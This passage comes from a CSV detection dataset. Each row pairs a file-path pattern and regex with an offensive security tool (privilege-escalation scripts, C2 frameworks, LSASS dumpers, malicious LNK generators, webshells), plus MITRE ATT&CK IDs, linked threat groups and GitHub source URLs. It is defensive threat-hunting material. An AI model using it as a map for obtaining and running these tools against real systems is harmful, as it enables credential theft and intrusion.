Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8533" "*/linpeas.txt*",".{0,1000}\/linpeas\.txt.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8534" "*/linpeasBaseBuilder.py*",".{0,1000}\/linpeasBaseBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8535" "*/linpeasBuilder.py*",".{0,1000}\/linpeasBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8536" "*/linux_ldso_dynamic.c*",".{0,1000}\/linux_ldso_dynamic\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8537" "*/linux_ldso_hwcap.c*",".{0,1000}\/linux_ldso_hwcap\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8538" "*/linux_ldso_hwcap_64.c*",".{0,1000}\/linux_ldso_hwcap_64\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8539" "*/linux_offset2lib.c*",".{0,1000}\/linux_offset2lib\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8540" "*/linux_stealth.py*",".{0,1000}\/linux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8541" "*/linux-exploit-suggester.sh*",".{0,1000}\/linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration 
toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","8546" "*/linux-pam-backdoor.git*",".{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","8547" "*/linuxprivchecker.git*",".{0,1000}\/linuxprivchecker\.git.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","1","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","8548" "*/linux-smart-enumeration.git*",".{0,1000}\/linux\-smart\-enumeration\.git.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","8549" "*/linWinPwn*",".{0,1000}\/linWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8550" "*/ListAllUsers.ps1*",".{0,1000}\/ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8551" "*/ListLogged-inUsers.ps1*",".{0,1000}\/ListLogged\-inUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8552" "*/listProxyPool?k=*",".{0,1000}\/listProxyPool\?k\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","10","N/A","N/A","N/A","N/A","8553" "*/ListRDPConnections.exe*",".{0,1000}\/ListRDPConnections\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8554" "*/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php*",".{0,1000}\/Liz0ziM\sPrivate\sSafe\sMode\sCommand\sExecuriton\sBypass\sExploit\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8555" "*/llmnr-resolve.nse*",".{0,1000}\/llmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8556" "*/lltd-discovery.nse*",".{0,1000}\/lltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8557" "*/lnk2pwn.git*",".{0,1000}\/lnk2pwn\.git.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","8560" "*/lnk2pwn-1.0.0.zip*",".{0,1000}\/lnk2pwn\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","8561" "*/lnkbomb.git*",".{0,1000}\/lnkbomb\.git.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential 
Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","8562" "*/lnkbomb.py*",".{0,1000}\/lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","8563" "*/LNKUp.git*",".{0,1000}\/LNKUp\.git.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","8564" "*/LNKUp/generate.py*",".{0,1000}\/LNKUp\/generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","8565" "*/load_ssp.x64.exe*",".{0,1000}\/load_ssp\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","8566" "*/load-assembly.py*",".{0,1000}\/load\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8567" "*/loadbalancer.py*",".{0,1000}\/loadbalancer\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","8568" "*/LoadDllRemote.cs*",".{0,1000}\/LoadDllRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8569" "*/loader/bypass.c",".{0,1000}\/loader\/bypass\.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","8570" "*/loader/bypass.h",".{0,1000}\/loader\/bypass\.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","8571" "*/loader/x64/Release/loader.exe*",".{0,1000}\/loader\/x64\/Release\/loader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","8572" "*/loadercrypt_*.php*",".{0,1000}\/loadercrypt_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8573" "*/LoaderMemoryModule_x64_Release.exe*",".{0,1000}\/LoaderMemoryModule_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","8574" "*/LoadLibrary_x64_Release.exe*",".{0,1000}\/LoadLibrary_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","8575" "*/local_execution_linux.exe*",".{0,1000}\/local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8576" 
"*/local_exploit_suggester*",".{0,1000}\/local_exploit_suggester.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","8577" "*/local_map.exe*",".{0,1000}\/local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8578" "*/local_thread_hijacking.exe*",".{0,1000}\/local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8579" "*/LocalAdminSharp.git*",".{0,1000}\/LocalAdminSharp\.git.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","8580" "*/LocalAdminSharp.sln*",".{0,1000}\/LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local 
administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","8581" "*/localbrute.ps1*",".{0,1000}\/localbrute\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","8582" "*/localbrute-extra-mini.ps1*",".{0,1000}\/localbrute\-extra\-mini\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","8583" "*/local-exploits/master/CVE*",".{0,1000}\/local\-exploits\/master\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8584" "*/LocalPotato.git*",".{0,1000}\/LocalPotato\.git.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","8585" "*/LocalPrivEsc/*",".{0,1000}\/LocalPrivEsc\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","8586" "*/localroot/2.6.x/elflbl*",".{0,1000}\/localroot\/2\.6\.x\/elflbl.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8587" "*/localroot/2.6.x/h00lyshit*",".{0,1000}\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8588" "*/LocalShellExtParse.git*",".{0,1000}\/LocalShellExtParse\.git.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","8589" "*/LocalShellExtParse.py*",".{0,1000}\/LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","8590" "*/localtonet.dll*",".{0,1000}\/localtonet\.dll.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8591" "*/localtonet.exe*",".{0,1000}\/localtonet\.exe.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8592" 